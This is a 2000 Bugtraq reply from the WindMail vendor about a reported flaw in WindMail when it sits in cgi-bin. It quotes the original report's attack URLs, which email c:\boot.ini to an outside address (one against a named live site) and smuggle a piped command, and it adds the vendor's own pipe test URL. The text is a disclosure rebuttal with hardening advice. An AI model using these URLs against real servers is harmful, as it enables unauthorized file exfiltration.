Re: Windmail allow web user get any file

[benc () GEOCEL COM (Ben Camp)]

In response to the following message:

> Date: Sat, 25 Mar 2000 22:41:46 -0000
> From: Frankie Zie <frankie () CNNS NET>
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: Windmail allow web user get any file
>
> I found some vulnerabilities if windmail run as a CGI
> application.tested On WindowsNT 4.0, Windmail 3.05
> successfully.
> WindMail is a 32-bit Windows console program by geocel that
> gives you command-line e-mail messaging capability.
> You can download an evaluation copy of WindMail 3.0 at:
> http://www.geocel.com/download/wmail301e.exe
>
> WindMail has a feature that allow Mail HTML form results
> from CGI scripts
> I found windmail doesn't check either attachment file or
> special character for parameters, that allow you execute
> arbitrary command which web user can do:
> http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
> 20yourmail () mail com%20|%20dir%20c:\
> After the request, windmail will send c:\boot.ini to
> yourmail () mail com and execute "dir c:\" command.
>
> For example:
> http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%
> 20chinahack () 163 net
> After a while, check chinahack () 163 net, i got a copy of
> boot.ini from www.metro.net
>
> pp () cnns net
> http://www.cnns.net

There are two issues presented here, and since they're unrelated I'll
approach them seperately.  First is a reported pipe vulnerability, then a
remote file send vulnerability.

1. REPORTED PIPE VULNERABILITY.  I tried this a variety of ways, and even
with other executables.  IF this exists at all (I could not duplicate the
execution of anything) it is most likely a GAPING IIS hole.  Piping happens
at the command interpreter level (before windmail is ever handed its
portion of the command line).  I tried a variety of methods to do this w/
his instructions (posted and sent to me previously) and have had zero luck.
 Additionally, because of the way IIS creates CGIs w/o real STDIO handles I
seriously doubt that this is possible.  If someone can demonstrate
otherwise I'm very interested.  This bug was removed from
SERCURITYFOCUS.COM for these reasons (irreproducable / not WindMail related).

Here is the final URL I was testing on:
http://localhost/windmail.exe?%20-n%20c:\boot.ini%20benc () geocel com%20|%20c:
\winnt\system32\cdplayer.exe

This did not produce an instance of CDPLAYER.EXE at all.  Even with the
zero-security model pp () cnns net is testing under.  This was tested for non
executable command shell commands (like dir) as well as other command line
apps.  I tested this with windmail.exe, cscript.exe, cdplayer.exe to name a
few.  In the above example CDPLAYER.EXE should start as a hung process.  It
never starts and never gets hung.

So I can say with reasonable certainty, after performing several tests and
consulting with others, that this bug report is purely misinformational.

2. REMOTE FILE SEND VULNERABILITY

First let me say this, because it has already been MISREPORTED in SANS
Digest.  WindMail is NOT a CGI program.  WindMail is NOT to be placed in
your CGI-BIN directory.  This has been re-categorized on SECURITYFOCUS.COM
as a configuration error.

Just as you would not copy AT.EXE, CACLS.EXE, NET.EXE, NBTSTAT.EXE, etc..
to your CGI-BIN do not copy WINDMAIL.EXE to your CGI-BIN.

Also, do not run your webserver as Administrator.  WindMail is a command
line mailer designed to work under the context of whoever is using it.
Just as it would be bad to copy /bin/rm to your cgi-bin run your HTTPD as
root, it would be wrong to say this is a problem with WindMail.  This is
essentially a server configuration problem which makes any functional
program which accepts command line arguments (and was copied to a world
executable directory like cgi-bin)exploitable to some degree.

So, in a server configuration where the Web server is running as
Administrator or the "System" account and where an administrator had
against the recommendations of the documentation and example scripts copied
WINDMAIL.EXE to their CGI-BIN there exists a vulnerability where any remote
user can, with the access they've been granted in the configuration,  send
any file as an attachment.  If the server is running as Domain
Administrator (or any other trusted network user), remote users will also
likely be able to email remote files with UNC paths (\\server\share\file).

SUGGESTED USAGE:

1. Do not copy WINDMAIL.EXE to the CGI-BIN directory.  Grant the
appropriate rights to the WINDMAIL directory so that CGIs called from your
web server can call WINDMAIL from its own directory.

2. Do not change the default user context which your webserver runs under
(IUSR_SERVERNAME by default on IIS) if you do not understand the security
implications.  On IIS the permissions are rather strict by defaul.

3. Do not grant Execute access to directories that do not need it.  This is
just opening your server up to potential problems.

OTHER SUGGESTIONS:
Some users have requested that we add add a constraint for which
directories files can be attached from.  This will be implemented in the
next version and will be set in the main configuration file.  Please send
any other suggestions or questions/comments/complaints to me directly at
benc () geocel com.  If you would like to be notified of updates/releases for
WindMail and our other products email sales () geocel com.

For the record, pp () cnns net has decided not to respond to my inquiries for
more information.  If he has some more information on the alleged PIPE
VULNERABILITY the implications are pretty large and I'd like to see it.

Thanks,

Ben Camp
benc () geocel com
Geocel International